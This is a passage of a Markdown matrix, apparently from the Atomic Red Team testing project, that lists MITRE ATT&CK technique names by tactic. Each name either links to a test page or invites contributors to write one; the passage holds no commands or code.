| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [Forced Authentication](../../T1187/T1187.md) | [Local Groups](../../T1069.001/T1069.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Network Shared Drive](../../T1039/T1039.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Native API](../../T1106/T1106.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Network Sniffing](../../T1040/T1040.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [PowerShell](../../T1059.001/T1059.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Python](../../T1059.006/T1059.006.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Multi-hop Proxy](../../T1090.003/T1090.003.md) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Scheduled Task](../../T1053.005/T1053.005.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Protocol Tunneling](../../T1572/T1572.md) | |
| | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Language Discovery](../../T1614.001/T1614.001.md) | | [Screen Capture](../../T1113/T1113.md) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Escape to Host](../../T1611/T1611.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Remote Access Software](../../T1219/T1219.md) | |
| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Video Capture](../../T1125/T1125.md) | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | [Visual Basic](../../T1059.005/T1059.005.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Emond](../../T1546.014/T1546.014.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Windows Management Instrumentation](../../T1047/T1047.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [System Service Discovery](../../T1007/T1007.md) | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | |
| | | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | |
| | | IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SAML Tokens](../../T1606.002/T1606.002.md) | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Accounts](../../T1078.003/T1078.003.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | | | | | | |
| | | [Launch Agent](../../T1543.001/T1543.001.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Launchd](../../T1053.004/T1053.004.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Local Accounts](../../T1078.003/T1078.003.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | [Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Port Monitors](../../T1547.010/T1547.010.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | [Office Application Startup](../../T1137/T1137.md) | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | [Office Test](../../T1137.002/T1137.002.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Outlook Home Page](../../T1137.004/T1137.004.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Injection](../../T1055/T1055.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | [Plist Modification](../../T1547.011/T1547.011.md) | [SID-History Injection](../../T1134.005/T1134.005.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
| | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | [Screensaver](../../T1546.002/T1546.002.md) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | |
| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Screensaver](../../T1546.002/T1546.002.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Trap](../../T1546.005/T1546.005.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
